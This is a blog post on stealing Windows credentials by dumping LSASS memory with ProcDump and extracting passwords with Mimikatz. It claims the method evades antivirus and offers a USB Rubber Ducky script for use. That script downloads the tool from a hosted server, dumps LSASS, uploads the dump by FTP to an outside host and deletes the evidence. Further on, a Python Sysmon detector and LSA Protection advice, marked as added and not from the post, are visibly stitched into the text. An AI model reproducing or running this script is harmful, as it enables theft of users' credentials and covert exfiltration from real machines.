Stealing Credentials with ProcDump and MimiKatz

Hello World.

For the longest time I’ve kept this domain as my personal repository for projects, files, and relics of time gone by. Since Infosec has taken over my time as a hobby and professionally, I figured I needed to resurrect my chunk of property online and start the blog back up.

Tinker was tweeting about manipulating memory dumps, and I mentioned I had a method to take a process dump and extract passwords from it. The great thing is that you're using Sysinternals Procdump to do so. Because Microsoft bought Sysinternals a few years ago, this method almost always gets through AV scanners. Unless a system has some strict application control policies, this method will work to extract hashes. The key here is to offload the memory dump to another machine and run mimikatz on it there.

There are a lot of ways to clean this script up and automate it further. Originally, I had the file named after the machine name and the date and time at which the dump was taken. That complicated things more than I wanted and kept messing things up. Perhaps the next person could improve on it some more.

I guess I'll be presenting on this at the next DHA. The goal is to do a live demonstration of this. YouTube video to follow.

  • Download Procdump to the machine.
  • Type: "procdump.exe -accepteula -ma lsass.exe $date$computer.dmp"
  • Run Mimikatz.
  • Type: "sekurlsa::Minidump lsassdump.dmp"
  • Then type: "sekurlsa::logonPasswords"

Additionally, I've created a USB Rubber Ducky script to automate the entire attack. Enjoy!


REM Open a PowerShell prompt from the Run dialog
DELAY 150
GUI r
DELAY 150
STRING powershell
ENTER
DELAY 150
STRING cd c:\temp\
ENTER
DELAY 150
REM Download procdump; <DOMAIN> is a placeholder for the hosting server
STRING $url = "http://www.<DOMAIN>/hack_tools/procdump.exe"
ENTER
DELAY 150
STRING $output = "c:\temp\procdump.exe"
ENTER
DELAY 150
STRING $start_time = Get-Date
ENTER
DELAY 150
STRING Invoke-WebRequest -Uri $url -OutFile $output
ENTER
DELAY 150
REM Dump lsass to victim.dmp (same step as in the list above)
STRING invoke-expression 'c:\temp\procdump.exe -accepteula -ma lsass.exe victim.dmp'
ENTER
DELAY 750
REM Offload the dump over FTP; <USERNAME> and <PASSWORD> are placeholders
STRING FTP
ENTER
DELAY 150
STRING open ftp.<DOMAIN> 21
ENTER
DELAY 150
STRING <USERNAME>
ENTER
DELAY 150
STRING <PASSWORD>
ENTER
DELAY 150
STRING cd /www/hack
ENTER
DELAY 150
STRING put victim.dmp
ENTER
REM Wait for the upload to finish before quitting
DELAY 30000
STRING quit
ENTER
DELAY 150
REM Clean up the downloaded tool and the dump file
STRING rm "c:\temp\procdump.exe"
ENTER
DELAY 150
STRING rm "victim.dmp"
ENTER
DELAY 150
STRING exit
ENTER
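From the defender's side, both the manual steps above and the Ducky script leave the same two footprints on the host: a process-creation event whose command line runs procdump against lsass, and a process-access event in which that procdump process opens lsass.exe with memory-read rights. The following is an added example, not code from this post: a small Python detector that runs over constructed, Sysmon-style Event ID 1 (process create) and Event ID 10 (process access) records and flags both patterns. Field names follow Sysmon's schema (CommandLine, SourceImage, TargetImage, GrantedAccess); the allowlist, the sample records and the helper names are assumptions made for this example.

```python
"""Detecting the LSASS-dump step of this technique.

Added example (not the post's code): a detector that runs over Sysmon-style
process-create (Event ID 1) and process-access (Event ID 10) records and flags
(a) procdump command lines that target lsass and (b) non-allowlisted processes
opening lsass.exe with memory-read rights. Records below are constructed.
"""
import re

# Windows process access rights (winnt.h). Reading another process's memory
# needs PROCESS_VM_READ; procdump -ma requests PROCESS_ALL_ACCESS (0x1FFFFF).
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that routinely open LSASS on a normal host. Assumption: tune this
# per environment after a baseline, otherwise Event 10 is very noisy.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command line of the dump step described in the post: procdump ... lsass
PROCDUMP_LSASS = re.compile(r"procdump\S*\s.*\blsass\b", re.IGNORECASE)


def flag_process_create(ev):
    """Event ID 1: return a finding string if the command line dumps lsass."""
    cmd = ev.get("CommandLine", "")
    if PROCDUMP_LSASS.search(cmd):
        return f"procdump invoked against lsass: {cmd}"
    return None


def flag_process_access(ev):
    """Event ID 10: return a finding if a non-allowlisted image reads lsass memory."""
    target = ev.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)  # Sysmon logs hex, e.g. 0x1FFFFF
    if granted & PROCESS_VM_READ:
        label = "PROCESS_ALL_ACCESS" if granted == PROCESS_ALL_ACCESS else f"0x{granted:X}"
        return f"{source} opened lsass.exe with {label}"
    return None


def scan(events):
    """Run both rules over a list of records; return (EventID, finding) tuples."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            hit = flag_process_create(ev)
        elif ev.get("EventID") == 10:
            hit = flag_process_access(ev)
        else:
            hit = None
        if hit:
            findings.append((ev["EventID"], hit))
    return findings


# Constructed sample records mirroring what the Ducky script above would produce,
# plus benign noise that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"c:\temp\procdump.exe",
     "CommandLine": r"c:\temp\procdump.exe -accepteula -ma lsass.exe victim.dmp"},
    {"EventID": 10, "SourceImage": r"c:\temp\procdump.exe",
     "TargetImage": r"c:\windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"c:\windows\system32\svchost.exe",
     "TargetImage": r"c:\windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"c:\windows\system32\taskmgr.exe",
     "TargetImage": r"c:\windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"c:\windows\system32\notepad.exe",
     "CommandLine": r"notepad.exe c:\temp\notes.txt"},
]

if __name__ == "__main__":
    for event_id, finding in scan(SAMPLE_EVENTS):
        print(f"[Sysmon {event_id}] {finding}")
```

Run against the sample records, the scan returns exactly two findings: the procdump command line and the procdump process opening lsass.exe with PROCESS_ALL_ACCESS; the svchost and taskmgr accesses and the notepad launch are ignored. The command-line rule is the weaker of the two, since it only fires when "lsass" literally appears in the arguments, so the Event ID 10 rule on GrantedAccess is the one worth investing in. As a preventive control, enabling LSA Protection (the RunAsPPL setting) stops a non-protected process such as procdump from opening LSASS with these rights in the first place.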

If you’d like more info on how this is done, please see Grabbing Passwords from Memory using Procdump and Mimikatz.
